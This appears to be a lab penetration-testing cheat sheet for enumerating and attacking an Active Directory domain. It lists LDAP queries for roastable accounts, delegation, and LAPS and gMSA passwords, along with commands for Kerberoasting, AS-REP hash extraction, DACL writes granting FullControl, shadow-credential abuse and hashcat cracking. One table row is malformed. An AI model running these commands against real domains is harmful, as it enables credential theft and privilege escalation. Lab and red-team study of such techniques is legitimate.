This matrix is the fast operational map. Pick the objective, copy the filter or tool command, then pivot into the focused note only when the result needs deeper handling.
Variables:
export DC=10.10.10.200
export DOMAIN=ootw.local
export NETBIOS=OOTW
export BASE='DC=ootw,DC=local'
export USER='student'
export PASS='student'
Query Matrix:
| Objective | LDAP filter | Attributes | Command |
|---|---|---|---|
| RootDSE / base DN | base search | namingContexts defaultNamingContext configurationNamingContext | ldapsearch -x -H ldap://$DC -s base -b '' namingContexts defaultNamingContext configurationNamingContext |
| All users | (&(objectCategory=person)(objectClass=user)) | sAMAccountName userPrincipalName memberOf description adminCount userAccountControl | ldapsearch -LLL -x -H ldap://$DC -D "$DOMAIN\\$USER" -w "$PASS" -E pr=1000/noprompt -o ldif-wrap=no -b "$BASE" '(&(objectCategory=person)(objectClass=user))' sAMAccountName userPrincipalName memberOf description adminCount userAccountControl |
| Privileged users | (&(objectCategory=person)(objectClass=user)(adminCount=1)) | sAMAccountName distinguishedName memberOf adminCount | ldapsearch -LLL -x -H ldap://$DC -D "$DOMAIN\\$USER" -w "$PASS" -b "$BASE" '(&(objectCategory=person)(objectClass=user)(adminCount=1))' sAMAccountName distinguishedName memberOf adminCount |
| Description hunting | (&(objectCategory=person)(objectClass=user)(description=*)) | sAMAccountName description memberOf | ldapsearch -LLL -x -H ldap://$DC -D "$DOMAIN\\$USER" -w "$PASS" -b "$BASE" '(&(objectCategory=person)(objectClass=user)(description=*))' sAMAccountName description memberOf |
| Enabled user baseline | (&(samAccountType=805306368)(!(userAccountControl:1.2.840.113556.1.4.803:=2))) | sAMAccountName distinguishedName memberOf userAccountControl | ldapsearch -LLL -x -H ldap://$DC -D "$DOMAIN\\$USER" -w "$PASS" -E pr=1000/noprompt -o ldif-wrap=no -b "$BASE" '(&(samAccountType=805306368)(!(userAccountControl:1.2.840.113556.1.4.803:=2)))' sAMAccountName distinguishedName memberOf userAccountControl |
| All groups | (objectClass=group) | cn sAMAccountName member description adminCount | ldapsearch -LLL -x -H ldap://$DC -D "$DOMAIN\\$USER" -w "$PASS" -E pr=1000/noprompt -b "$BASE" '(objectClass=group)' cn sAMAccountName member description adminCount |
| Domain Admins | (cn=Domain Admins) | cn member memberOf adminCount | ldapsearch -LLL -x -H ldap://$DC -D "$DOMAIN\\$USER" -w "$PASS" -b "$BASE" '(cn=Domain Admins)' cn member memberOf adminCount |
| All computers | (objectCategory=computer) | sAMAccountName dNSHostName operatingSystem servicePrincipalName | ldapsearch -LLL -x -H ldap://$DC -D "$DOMAIN\\$USER" -w "$PASS" -E pr=1000/noprompt -b "$BASE" '(objectCategory=computer)' sAMAccountName dNSHostName operatingSystem servicePrincipalName |
| Servers | (&(objectCategory=computer)(operatingSystem=*Server*)) | sAMAccountName dNSHostName operatingSystem | ldapsearch -LLL -x -H ldap://$DC -D "$DOMAIN\\$USER" -w "$PASS" -b "$BASE" '(&(objectCategory=computer)(operatingSystem=*Server*))' sAMAccountName dNSHostName operatingSystem |
| Domain controllers | (&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=8192)) | name dNSHostName operatingSystem | ldapsearch -LLL -x -H ldap://$DC -D "$DOMAIN\\$USER" -w "$PASS" -b "$BASE" '(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=8192))' name dNSHostName operatingSystem |
| SPN accounts | (servicePrincipalName=*) | sAMAccountName servicePrincipalName memberOf adminCount | ldapsearch -LLL -x -H ldap://$DC -D "$DOMAIN\\$USER" -w "$PASS" -b "$BASE" '(servicePrincipalName=*)' sAMAccountName servicePrincipalName memberOf adminCount |
| Kerberoastable users | (&(objectCategory=person)(objectClass=user)(servicePrincipalName=*)) | sAMAccountName servicePrincipalName memberOf adminCount | ldapsearch -LLL -x -H ldap://$DC -D "$DOMAIN\\$USER" -w "$PASS" -b "$BASE" '(&(objectCategory=person)(objectClass=user)(servicePrincipalName=*))' sAMAccountName servicePrincipalName memberOf adminCount |
| AS-REP roastable users | (&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304)) | sAMAccountName userAccountControl | ldapsearch -LLL -x -H ldap://$DC -D "$DOMAIN\\$USER" -w "$PASS" -b "$BASE" '(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))' sAMAccountName userAccountControl |
| Enabled Kerberoastable users | (&(samAccountType=805306368)(servicePrincipalName=*)(!samAccountName=krbtgt)(!(userAccountControl:1.2.840.113556.1.4.803:=2))) | name sAMAccountName servicePrincipalName | ldapsearch -LLL -x -H ldap://$DC -D "$DOMAIN\\$USER" -w "$PASS" -b "$BASE" '(&(samAccountType=805306368)(servicePrincipalName=*)(!samAccountName=krbtgt)(!(userAccountControl:1.2.840.113556.1.4.803:=2)))' name sAMAccountName servicePrincipalName |
| Enabled AS-REP roastable users | (&(samAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=4194304)(!(userAccountControl:1.2.840.113556.1.4.803:=2))) | name sAMAccountName userAccountControl | ldapsearch -LLL -x -H ldap://$DC -D "$DOMAIN\\$USER" -w "$PASS" -b "$BASE" '(&(samAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=4194304)(!(userAccountControl:1.2.840.113556.1.4.803:=2)))' name sAMAccountName userAccountControl |
| Password never expires | (&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=65536)) | sAMAccountName memberOf userAccountControl | ldapsearch -LLL -x -H ldap://$DC -D "$DOMAIN\\$USER" -w "$PASS" -b "$BASE" '(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=65536))' sAMAccountName memberOf userAccountControl |
| Disabled users | (&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=2)) | sAMAccountName userAccountControl | ldapsearch -LLL -x -H ldap://$DC -D "$DOMAIN\\$USER" -w "$PASS" -b "$BASE" '(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=2))' sAMAccountName userAccountControl |
| Unconstrained delegation | (userAccountControl:1.2.840.113556.1.4.803:=524288) | sAMAccountName dNSHostName servicePrincipalName userAccountControl | ldapsearch -LLL -x -H ldap://$DC -D "$DOMAIN\\$USER" -w "$PASS" -b "$BASE" '(userAccountControl:1.2.840.113556.1.4.803:=524288)' sAMAccountName dNSHostName servicePrincipalName userAccountControl |
| Constrained delegation | (msDS-AllowedToDelegateTo=*) | sAMAccountName servicePrincipalName msDS-AllowedToDelegateTo | ldapsearch -LLL -x -H ldap://$DC -D "$DOMAIN\\$USER" -w "$PASS" -b "$BASE" '(msDS-AllowedToDelegateTo=*)' sAMAccountName servicePrincipalName msDS-AllowedToDelegateTo |
| RBCD targets | (msDS-AllowedToActOnBehalfOfOtherIdentity=*) | sAMAccountName dNSHostName msDS-AllowedToActOnBehalfOfOtherIdentity | ldapsearch -LLL -x -H ldap://$DC -D "$DOMAIN\\$USER" -w "$PASS" -b "$BASE" '(msDS-AllowedToActOnBehalfOfOtherIdentity=*)' sAMAccountName dNSHostName msDS-AllowedToActOnBehalfOfOtherIdentity |
| SIDHistory | (sIDHistory=*) | name sAMAccountName objectSid sIDHistory | ldapsearch -LLL -x -H ldap://$DC -D "$DOMAIN\\$USER" -w "$PASS" -b "$BASE" '(sIDHistory=*)' name sAMAccountName objectSid sIDHistory |
| Trusts | (objectClass=trustedDomain) | trustPartner trustDirection trustAttributes flatName | ldapsearch -LLL -x -H ldap://$DC -D "$DOMAIN\\$USER" -w "$PASS" -b "$BASE" '(objectClass=trustedDomain)' trustPartner trustDirection trustAttributes flatName |
| Trust accounts | (samAccountType=805306370) | sAMAccountName distinguishedName userAccountControl | ldapsearch -LLL -x -H ldap://$DC -D "$DOMAIN\\$USER" -w "$PASS" -b "$BASE" '(samAccountType=805306370)' sAMAccountName distinguishedName userAccountControl |
| Foreign security principals | (objectClass=foreignSecurityPrincipal) | cn memberOf distinguishedName | ldapsearch -LLL -x -H ldap://$DC -D "$DOMAIN\\$USER" -w "$PASS" -b "$BASE" '(objectClass=foreignSecurityPrincipal)' cn memberOf distinguishedName |
| GPOs | (objectClass=groupPolicyContainer) | displayName gPCFileSysPath gPCWQLFilter | ldapsearch -LLL -x -H ldap://$DC -D "$DOMAIN\\$USER" -w "$PASS" -b "$BASE" '(objectClass=groupPolicyContainer)' displayName gPCFileSysPath gPCWQLFilter |
| GPO links | `(&( | (objectClass=organizationalUnit)(objectClass=domain))(gPLink=*))` | objectClass name distinguishedName gPLink |
| WMI filters | (objectClass=msWMI-Som) | name msWMI-Name msWMI-Parm2 | ldapsearch -LLL -x -H ldap://$DC -D "$DOMAIN\\$USER" -w "$PASS" -b "CN=SOM,CN=WMIPolicy,CN=System,$BASE" '(objectClass=msWMI-Som)' name msWMI-Name msWMI-Parm2 |
| MSSQL SPNs | (&(samAccountType=805306368)(servicePrincipalName=MSSQLSvc*)) | name sAMAccountName servicePrincipalName | ldapsearch -LLL -x -H ldap://$DC -D "$DOMAIN\\$USER" -w "$PASS" -b "$BASE" '(&(samAccountType=805306368)(servicePrincipalName=MSSQLSvc*))' name sAMAccountName servicePrincipalName |
| Shadow Credentials present | (msDS-KeyCredentialLink=*) | sAMAccountName msDS-KeyCredentialLink | LDAPTLS_REQCERT=never ldapsearch -LLL -x -H ldaps://$DC:636 -D "$DOMAIN\\$USER" -w "$PASS" -b "$BASE" '(msDS-KeyCredentialLink=*)' sAMAccountName msDS-KeyCredentialLink |
| Legacy LAPS readable | (ms-Mcs-AdmPwd=*) | dNSHostName ms-Mcs-AdmPwd ms-Mcs-AdmPwdExpirationTime | LDAPTLS_REQCERT=never ldapsearch -LLL -x -H ldaps://$DC:636 -D "$DOMAIN\\$USER" -w "$PASS" -b "$BASE" '(ms-Mcs-AdmPwd=*)' dNSHostName ms-Mcs-AdmPwd ms-Mcs-AdmPwdExpirationTime |
| Windows LAPS readable | (msLAPS-Password=*) | dNSHostName msLAPS-Password msLAPS-PasswordExpirationTime | LDAPTLS_REQCERT=never ldapsearch -LLL -x -H ldaps://$DC:636 -D "$DOMAIN\\$USER" -w "$PASS" -b "$BASE" '(msLAPS-Password=*)' dNSHostName msLAPS-Password msLAPS-PasswordExpirationTime |
| gMSA accounts | (objectClass=msDS-GroupManagedServiceAccount) | sAMAccountName msDS-GroupMSAMembership msDS-ManagedPassword | LDAPTLS_REQCERT=never ldapsearch -LLL -x -H ldaps://$DC:636 -D "$DOMAIN\\$USER" -w "$PASS" -b "$BASE" '(objectClass=msDS-GroupManagedServiceAccount)' sAMAccountName msDS-GroupMSAMembership msDS-ManagedPassword |
| Deleted objects | (isDeleted=TRUE) | cn sAMAccountName objectClass whenDeleted msDS-LastKnownParent | ldapsearch -LLL -x -H ldap://$DC -D "$DOMAIN\\$USER" -w "$PASS" -b "$BASE" -s sub -E '1.2.840.113556.1.4.417' '(isDeleted=TRUE)' cn sAMAccountName objectClass whenDeleted msDS-LastKnownParent |
| Object SID and GUID | (sAMAccountName=student) | objectSid objectGUID | ldapsearch -LLL -x -H ldap://$DC -D "$DOMAIN\\$USER" -w "$PASS" -b "$BASE" '(sAMAccountName=student)' objectSid objectGUID |
| Security descriptor attempt | base DN | nTSecurityDescriptor | LDAPTLS_REQCERT=never ldapsearch -LLL -x -H ldaps://$DC:636 -D "$DOMAIN\\$USER" -w "$PASS" -b 'CN=svc_web,OU=Service Accounts,OU=OOTW Lab,DC=ootw,DC=local' -s base nTSecurityDescriptor |
Tool Matrix:
| Objective | Tool command |
|---|---|
| NetExec authenticate to LDAP | nxc ldap $DC -d $NETBIOS -u $USER -p "$PASS" |
| NetExec users | nxc ldap $DC -d $NETBIOS -u $USER -p "$PASS" --users |
| NetExec groups | nxc ldap $DC -d $NETBIOS -u $USER -p "$PASS" --groups |
| NetExec computers | nxc ldap $DC -d $NETBIOS -u $USER -p "$PASS" --computers |
| NetExec password policy | nxc ldap $DC -d $NETBIOS -u $USER -p "$PASS" --pwdPolicy |
| NetExec AdminCount | nxc ldap $DC -d $NETBIOS -u $USER -p "$PASS" --admin-count |
| NetExec Kerberoast prep | nxc ldap $DC -d $NETBIOS -u $USER -p "$PASS" -M get-spns |
| NetExec AS-REP roasting | nxc ldap $DC -d $NETBIOS -u $USER -p "$PASS" -M asreproast |
| NetExec delegation | nxc ldap $DC -d $NETBIOS -u $USER -p "$PASS" -M findDelegation |
| NetExec RBCD | nxc ldap $DC -d $NETBIOS -u $USER -p "$PASS" -M rbcd |
| NetExec trusts | nxc ldap $DC -d $NETBIOS -u $USER -p "$PASS" -M get-trusts |
| NetExec ADCS | nxc ldap $DC -d $NETBIOS -u $USER -p "$PASS" -M adcs |
| NetExec LAPS | nxc ldap $DC -d $NETBIOS -u $USER -p "$PASS" -M laps |
| NetExec gMSA | nxc ldap $DC -d $NETBIOS -u $USER -p "$PASS" -M gmsa |
| windapsearch users | python3 windapsearch.py -d $DOMAIN -u $USER -p "$PASS" --users |
| windapsearch groups | python3 windapsearch.py -d $DOMAIN -u $USER -p "$PASS" --groups |
| windapsearch computers | python3 windapsearch.py -d $DOMAIN -u $USER -p "$PASS" --computers |
| windapsearch Domain Admins | python3 windapsearch.py -d $DOMAIN -u $USER -p "$PASS" --da |
| windapsearch SPNs | python3 windapsearch.py -d $DOMAIN -u $USER -p "$PASS" --spns |
| windapsearch delegation | python3 windapsearch.py -d $DOMAIN -u $USER -p "$PASS" --delegate |
| windapsearch AS-REP | python3 windapsearch.py -d $DOMAIN -u $USER -p "$PASS" --asreproast |
| Impacket Kerberoast tickets | GetUserSPNs.py $DOMAIN/$USER:"$PASS" -dc-ip $DC -request -outputfile kerberoast.tgs |
| Impacket AS-REP hashes | GetNPUsers.py $DOMAIN/$USER:"$PASS" -dc-ip $DC -request -format hashcat -outputfile asrep.hashes |
| Impacket DACL read | dacledit.py -action read -target svc_web "$DOMAIN/$USER:$PASS" -dc-ip $DC |
| Impacket DACL write | dacledit.py -action write -rights FullControl -principal $USER -target svc_web "$DOMAIN/$USER:$PASS" -dc-ip $DC |
| Impacket owner read | owneredit.py -action read -target svc_web "$DOMAIN/$USER:$PASS" -dc-ip $DC |
| Impacket SID lookup | lookupsid.py $DOMAIN/$USER:"$PASS"@$DC |
| Certipy Shadow Credentials auto | certipy shadow auto -u $USER@$DOMAIN -p "$PASS" -account svc_web -dc-ip $DC |
| Certipy Shadow Credentials clear | certipy shadow clear -u $USER@$DOMAIN -p "$PASS" -account svc_web -dc-ip $DC |
| pyWhisker add key credential | python3 pywhisker.py -d $DOMAIN -u $USER -p "$PASS" --target svc_web --action add --filename svc_web |
| PKINITtools request TGT | python3 gettgtpkinit.py -cert-pfx svc_web.pfx -pfx-pass PFX_PASSWORD $DOMAIN/svc_web svc_web.ccache |
| Hashcat Kerberoast cracking | hashcat -m 13100 kerberoast.tgs /usr/share/wordlists/rockyou.txt |
| Hashcat AS-REP cracking | hashcat -m 18200 asrep.hashes /usr/share/wordlists/rockyou.txt |
| Apache Directory Studio interactive LDAP browsing | ApacheDirectoryStudio |
Troubleshooting Matrix:
| Symptom | Fix |
|---|---|
| Size limit exceeded | Add -E pr=1000/noprompt |
| Wrapped output breaks parsing | Add -o ldif-wrap=no |
| Stronger authentication required | Use -ZZ on LDAP 389 or switch to ldaps://$DC:636 |
| LDAPS certificate fails in lab | Prefix with LDAPTLS_REQCERT=never |
| Password reset fails | Use LDAPS and UTF-16LE base64 encoded quoted password |
nTSecurityDescriptor empty | Use PowerView or Impacket dacledit.py |
| Kerberos bind fails | Check time sync, realm casing, DNS, and klist |
| Attribute add says value exists | Use replace or delete the exact existing value first |
| Change disappears later | Check adminCount and AdminSDHolder behavior |